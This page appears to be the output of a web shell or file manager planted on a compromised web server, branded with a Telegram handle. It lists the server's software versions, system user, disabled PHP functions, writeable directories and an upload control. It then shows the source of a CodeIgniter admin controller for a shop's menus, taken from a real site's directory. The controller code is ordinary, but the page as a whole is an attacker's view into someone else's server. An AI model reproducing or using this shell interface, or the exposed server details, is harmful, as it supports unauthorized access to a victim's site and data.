https://t.me/RX1948
Server : Apache/2.4.18 (Ubuntu)
System : Linux canvaswebdesign 3.13.0-71-generic #114-Ubuntu SMP Tue Dec 1 02:34:22 UTC 2015 x86_64
User : oppastar ( 1041)
PHP Version : 7.0.33-0ubuntu0.16.04.15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Directory :  /var/www/kamariallee.com/public_html/application/controllers/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/kamariallee.com/public_html/application/controllers/admin/Menus.php
<?php  if ( ! defined('BASEPATH')) exit('No direct script access allowed');

class Menus extends Admin_Controller {

	//this property is used for validating existing menu title on call back edit menu
	private $menu_current_id = NULL;
		 
	function __construct() {
		parent::__construct();	
		$this->load->model('menu_m'); 
	}
		
	//this is to list all menus
	public function index() {
		
		//pagination in action. 50 results per page
		$this->load->library('pagination');
		$config['base_url'] = base_url() . 'admin/menus/index';
		$config['per_page'] = 50;
		$config["uri_segment"] = 4; 

		//fetch all menus
		$config['total_rows'] = $this->menu_m->record_count(); 
		$this->pagination->initialize($config);
   		$this->data['menus'] = $this->menu_m->get_all_menus($config["per_page"], 
		$this->uri->segment(4)); 
	
		//load view
		$this->data['subview'] = 'admin/menus/index';
		$this->load->view('admin/templates/header', $this->data_header); 
		$this->load->view('admin/_layout_main', $this->data);
		$this->load->view('admin/templates/footer');	
    }
	
	//to add a new menu 
	public function add() {
	
	$this->data['menus'] = $this->menu_m->get_new();  	

		//get ordering number and display at add form
		$this->db->select_max('priority')->from('menus');
		$current_priority = $this->db->get()->row()->priority;
		if($current_priority == NULL) {
			$this->data['menus']->priority = 1;	
		} else {
			$this->data['menus']->priority = $current_priority + 1;
		}  
		
		//validation in action
		//validation check in action
		$rules = $this->menu_m->rules; 

		$config = $this->check_form_validation($rules, $_POST);
		
		$this->load->library('form_validation');
		$this->form_validation->set_error_delimiters('<div class="error">', '</div>'); //above is to add class to form validation error, to be styled
		$this->form_validation->set_rules($config); 
		$this->form_validation->set_error_delimiters('<div class="error">', '</div>');

		if($this->form_validation->run($this) == TRUE) {
			
				$data = $this->process_data($_POST);
				
				$this->menu_m->add_menu($data); 

				$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Menu Add Successful</p>');

				redirect('admin/menus');
			
		} 
		
		$this->data['subview'] = 'admin/menus/edit';
		$this->load->view('admin/templates/header', $this->data_header); 
		$this->load->view('admin/_layout_main', $this->data);
		$this->load->view('admin/templates/footer');
	}
	
	//to edit menu in admin
	public function edit($id = NULL) {

		//check if id exist. If not exist, show 404.
		$count = $this->menu_m->count_exist($id);
		
		if ($count == 0) { 
			//page not exist
			show_404();
		}	

		$this->menu_current_id = (int) $id;	

		$this->data['menus'] = $this->menu_m->get($id);	
		
		//validation check in action
		$rules = $this->menu_m->rules;
		$config = $this->check_form_validation($rules, $_POST);

		$this->load->library('form_validation');
		$this->form_validation->set_error_delimiters('<div class="error">', '</div>'); //above is to add class to form validation error, to be styled
		$this->form_validation->set_rules($config); 
		$this->form_validation->set_error_delimiters('<div class="error">', '</div>');

		if($this->form_validation->run($this) == TRUE) {
			
			$data = $this->process_data($_POST);

			$this->menu_m->edit_menu($id, $data); 

			$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">menu Edit Successful</p>');
			
			redirect('admin/menus');
			
		} 
		
		$this->data['subview'] = 'admin/menus/edit';
		$this->load->view('admin/templates/header', $this->data_header); 
		$this->load->view('admin/_layout_main', $this->data);
		$this->load->view('admin/templates/footer');	
	}
	
	
	//to delete a menu
	public function delete($id) {

		//check if id exist. If not exist, show 404.
		$count = $this->menu_m->count_exist($id);
		
		if ($count == 0) {  
			//page not exist 
			show_404(); 
		}		
		
		//delete menu
		$this->menu_m->delete($id);

		$this->session->set_flashdata('success', '<br><p style="background:green; color:white; padding:5px; font-weight:bold;">Menu Delete Successful</p>');
		redirect('admin/menus');
	}

	public function ajax_get_menutype() { 

		$this->load->helper('form');

		//test if ajax call to prevent direct access
		if (!$this->input->is_ajax_request()) {
   			exit('No direct script access allowed'); 
		} 

		$menu_type = $this->input->post('menu_type');
		$current_menu_id = $this->input->post('current_menu_id');

		switch ($menu_type) {
			
			case 'category':

				//get all parent categories
				$this->db->select('*')->from('categories')->where('status', 1)->where('parent', NULL)->order_by('id_categories', 'ASC');
				$data['categories'] = $this->db->get()->result(); 

				if ($current_menu_id == NULL) { 
					$data['current_category_id'] = NULL;
				} else {
					//get current active category_id
					$this->db->select('category_id, menu_link')->from('menus')->where('id_menus', 
					(int) $current_menu_id);
					$category_id = $this->db->get()->row();	

					if ($category_id->category_id == NULL) {
						
						if ($category_id->menu_link == 'all') {
							$data['current_category_id'] = 'all';
						} elseif ($category_id->menu_link == 'new_arrivals') {
							$data['current_category_id'] = 'new';
						} elseif ($category_id->menu_link == 'sale') {
							$data['current_category_id'] = 'sale';
						} elseif ($category_id->menu_link == 'bestseller') {
							$data['current_category_id'] = 'bestseller';
						} 	 

					} else {
						$data['current_category_id'] = $category_id->category_id;
					}
				}
				$this->load->view('admin/menus/ajax_get_category', $data); 

			break;
			
			case 'brand':  

				//get all brands
				$this->db->select('*')->from('brands')->where('status', 1)->order_by('id_brands', 'ASC');
				$data['brands'] = $this->db->get()->result(); 

				if ($current_menu_id == NULL) { 
					
					$data['current_brand_id'] = NULL;
				
				} else {

					//get current active brand_id
					$this->db->select('brand_id, menu_link')->from('menus')->where('id_menus', (int) $current_menu_id);
					$brand_id = $this->db->get()->row();	

					if ($brand_id->brand_id == NULL) {
						
						if ($brand_id->menu_link == 'brand/all') {
							$data['current_brand_id'] = 'all';
						}

					} else {

						$data['current_brand_id'] = $brand_id->brand_id; 
					}
				}

				$this->load->view('admin/menus/ajax_get_brands', $data);

			break;	

			
			case 'page':

				//get all pages
				$this->db->select('*')->from('pages')->where('status', 1)->order_by('id_pages', 'ASC');
				$data['pages'] = $this->db->get()->result(); 

				if ($current_menu_id == NULL) {
					
					$data['current_page_id'] = NULL;
				
				} else { 

					//get current active page_id
					$this->db->select('page_id')->from('menus')->where('id_menus', 
					(int) $current_menu_id);
					$data['current_page_id'] = $this->db->get()->row();	 
				}

				$this->load->view('admin/menus/ajax_get_pages', $data);

			break;		

			case 'external':

				if ($current_menu_id == NULL) {
					
					$this->load->view('admin/menus/ajax_get_external'); 				
	
				} else { 

					//get current external link
					$this->db->select('menu_link')->from('menus')->where('id_menus', 
					(int) $current_menu_id);
					$data['current_external_link'] = $this->db->get()->row();

					$this->load->view('admin/menus/ajax_get_external', $data); 	 
				}
			break;		
		}
	}

	//callback function validation add new menu
	public function _cek_existing_menu_title($str) {

		$num_rows = $this->menu_m->cek_existing_menu_title($str, $this->menu_current_id);   
		if ($num_rows != 0 ) { 
			$this->form_validation->set_message('_cek_existing_menu_title', 'Menu name already exist !'); 
			return FALSE;
		} else {
			return TRUE;    
		}
	}

	private function check_form_validation($config, $post_data) {

		if (isset($post_data['category'])) {

			$config[] = array(
				'field'   => 'category', 
                'label'   => 'category',
                'rules'   => 'trim|required'
			);
		}

		if (isset($post_data['brand'])) {
			
			$config[] = array(
				'field'   => 'brand',  
                'label'   => 'brand',
                'rules'   => 'trim|required'
			);
		}

		if (isset($post_data['page'])) {
			
			$config[] = array(
				'field'   => 'page', 
                'label'   => 'page',
                'rules'   => 'trim|required'
			);
		}

		if (isset($post_data['external_link'])) {
			
			$config[] = array(
				'field'   => 'external_link', 
                'label'   => 'External Link',
                'rules'   => 'trim|required'
			);
		}
		return $config;
	}

	private function process_data($post_data) {

		$menu_type = $post_data['menu_type'];

		$data = array(
			'menu' => $post_data['menu'],
			'alias' => url_title($post_data['menu']),
			'menu_type' => $menu_type,
			'status' => $post_data['status'],
			'priority' => (int) $post_data['priority'],
		);

		if ($menu_type == 'category') {

			if ($post_data['category'] == 'all') { 
				
				$data['menu_link'] = 'all';
				$data['category_id'] = NULL;
				$data['brand_id'] = NULL;
				$data['page_id'] = NULL;

			} elseif ($post_data['category'] == 'new') {
				
				$data['menu_link'] = 'new_arrivals';
				$data['category_id'] = NULL;
				$data['brand_id'] = NULL;
				$data['page_id'] = NULL;

			} elseif ($post_data['category'] == 'sale') {
			
				$data['menu_link'] = 'sale';	
				$data['category_id'] = NULL;
				$data['brand_id'] = NULL;
				$data['page_id'] = NULL;	

			} elseif ($post_data['category'] == 'bestseller') {

				$data['menu_link'] = 'bestseller';	
				$data['category_id'] = NULL;
				$data['brand_id'] = NULL;
				$data['page_id'] = NULL;	

			} else {
				
				//individual category item..
				$category_id = (int) $post_data['category'];
				$this->db->select('parent')->from('categories')->where('id_categories', $category_id);
				$parent_id = $this->db->get()->row()->parent;

				//check parent_id
				if($parent_id === NULL) {

					$this->db->select('alias')->from('categories')->where('id_categories', $category_id);
					$alias = $this->db->get()->row()->alias;
					//this category is level 1 category
					$data['menu_link'] = 'category/' .$alias;

				} elseif($parent_id !== NULL) {

					$this->db->select('parent')->from('categories')->where('id_categories', $parent_id);
					$parent2_id = $this->db->get()->row()->parent;

					if($parent2_id == NULL) {  

						//this is level 2 category..
						//get level 1 alias
						$this->db->select('alias')->from('categories')->where('id_categories', $parent_id);
						$alias_level1 = $this->db->get()->row()->alias;

						//get level 2 alias
						$this->db->select('alias')->from('categories')->where('id_categories', $category_id);
						$alias_level2 = $this->db->get()->row()->alias;

						$data['menu_link'] = 'category/' .$alias_level1 . '/' . $alias_level2;
						
					} else {

						//this is level 3 category..
						//get level 3 alias
						$this->db->select('alias')->from('categories')->where('id_categories', $category_id);
						$alias_level3 = $this->db->get()->row()->alias;

						//get level 2 alias
						$this->db->select('alias')->from('categories')->where('id_categories', $parent_id);
						$alias_level2 = $this->db->get()->row()->alias;

						//get level 1 alias
						$this->db->select('parent')->from('categories')->where('id_categories', $parent_id);
						$level1_id = $this->db->get()->row()->parent;

						$this->db->select('alias')->from('categories')->where('id_categories', $level1_id);
						$alias_level1 = $this->db->get()->row()->alias;

						$data['menu_link'] = 'category/' .$alias_level1 . '/' . $alias_level2 . '/' . $alias_level3;
						
					}
				}

				$data['category_id'] = $category_id;
				$data['brand_id'] = NULL;
				$data['page_id'] = NULL;
			}
		}

		if ($menu_type == 'brand') {
			if ($post_data['brand'] == 'all') {
				$data['menu_link'] = 'brand/all';
				$data['category_id'] = NULL;
				$data['brand_id'] = NULL;
				$data['page_id'] = NULL;
			} else {
				$brand_id = (int) $post_data['brand'];
				$this->db->select('alias')->from('brands')->where('id_brands', $brand_id);
				$brand_alias = $this->db->get()->row();
				$data['menu_link'] = 'brand/' . $brand_alias->alias;
				$data['brand_id'] = $brand_id;
				$data['category_id'] = NULL;
				$data['page_id'] = NULL; 
			}
		}

		if ($menu_type == 'page') {
			$page_id = (int) $post_data['page'];
			$this->db->select('alias')->from('pages')->where('id_pages', $page_id);
			$page_alias = $this->db->get()->row();
			$data['menu_link'] = 'page/' . $page_alias->alias;
			$data['page_id'] = $page_id;
			$data['category_id'] = NULL;
			$data['brand_id'] = NULL;		
		}

		if ($menu_type == 'external') { 
			$data['menu_link'] = $post_data['external_link'];
			$data['category_id'] = NULL;
			$data['brand_id'] = NULL;
			$data['page_id'] = NULL; 
		}

		return $data;		

	}
	
		
}

https://t.me/RX1948 - 2025